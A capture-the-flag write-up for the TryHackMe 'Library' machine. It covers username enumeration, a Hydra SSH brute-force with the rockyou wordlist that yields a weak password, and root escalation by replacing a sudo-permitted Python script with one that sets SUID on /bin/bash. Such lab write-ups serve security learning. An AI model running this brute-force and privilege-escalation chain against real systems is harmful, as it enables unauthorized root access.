Tryhackme - Library Writeup
Platform: TryHackMe
Difficulty: Easy
OS: Linux
Reconnaissance
Nmap
nmap -sC -sV -A MACHINE_IP -oA nmap
Open ports:
- 22/tcp — OpenSSH 7.2p2 (Ubuntu)
- 80/tcp — Apache 2.4.18, title:
Welcome to Blog - Library Machine
Web Enumeration
Visiting port 80 revealed a blog page. The blog post was authored by meliodas — a valid username. The comments section also leaked root and www-data as system usernames.
robots.txt contained an unusual entry:
User-agent: rockyou
Disallow: /
This is a hint to use the rockyou.txt wordlist for brute-forcing.
Directory brute-forcing with feroxbuster and dirsearch found nothing beyond static assets (/images/, master.css, logo.png) — no web application attack surface.
Initial Access
SSH Brute-Force with Hydra
Using the discovered username and the rockyou wordlist hint:
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://MACHINE_IP -t 4
Result:
[22][ssh] host: MACHINE_IP login: meliodas password: iloveyou1
SSH Login
ssh meliodas@MACHINE_IP
meliodas@ubuntu:~$ ls
bak.py user.txt
meliodas@ubuntu:~$ cat user.txt
THM{REDACTED}
Privilege Escalation
Sudo Enumeration
sudo -l
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
Any Python binary can run /home/meliodas/bak.py as root without a password.
Inspecting bak.py
cat bak.py
#!/usr/bin/env python
import os
import zipfile
def zipdir(path, ziph):
for root, dirs, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file))
if __name__ == '__main__':
zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
zipdir('/var/www/html', zipf)
zipf.close()
The file is owned by root (-rw-r--r-- 1 root root), so it cannot be edited directly. However, the home directory is writable by meliodas, meaning the file can be deleted and recreated.
Exploitation
Delete the original file and replace it with a malicious one:
rm /home/meliodas/bak.py
cat > /home/meliodas/bak.py << 'EOF'
import os
os.system("chmod +s /bin/bash")
EOF
Run it with sudo:
sudo /usr/bin/python3 /home/meliodas/bak.py
This sets the SUID bit on /bin/bash. Spawn a privileged shell:
/bin/bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
THM{REDACTED}
Summary
Library is a straightforward boot2root machine. The initial foothold relies on OSINT from the web page (username enumeration) combined with a clever robots.txt hint pointing to rockyou. The privilege escalation abuses an overly permissive sudo rule — python* matches any Python binary, and the target script lives in a user-controlled directory, allowing it to be replaced entirely.
Key Vulnerabilities
| # | Vulnerability | Impact |
|---|---|---|
| 1 | Username disclosed in webpage source | User enumeration |
| 2 | robots.txt hints at rockyou wordlist |
SSH brute-force vector |
| 3 | Weak SSH password (iloveyou1) |
Initial access as meliodas |
| 4 | sudo allows any Python binary on user-writable bak.py |
Privilege escalation to root |
Attack Chain
HTTP enumeration (port 80)
│
▼
Username: meliodas (blog post author)
robots.txt User-agent: rockyou (wordlist hint)
│
▼
Hydra SSH brute-force → meliodas:iloveyou1
│
▼
SSH login → user.txt
│
▼
sudo -l: /usr/bin/python* /home/meliodas/bak.py (NOPASSWD)
bak.py owned by root but home dir writable → rm + recreate
│
▼
Malicious bak.py: chmod +s /bin/bash
sudo python3 bak.py → /bin/bash -p → root shell
Tools Used
| Tool | Purpose |
|---|---|
| Nmap | Port scanning and service enumeration |
| dirsearch / feroxbuster | Web directory brute-forcing |
| Hydra | SSH password brute-force |
| curl | Manual HTTP inspection |
| bash | SUID bash privilege escalation |
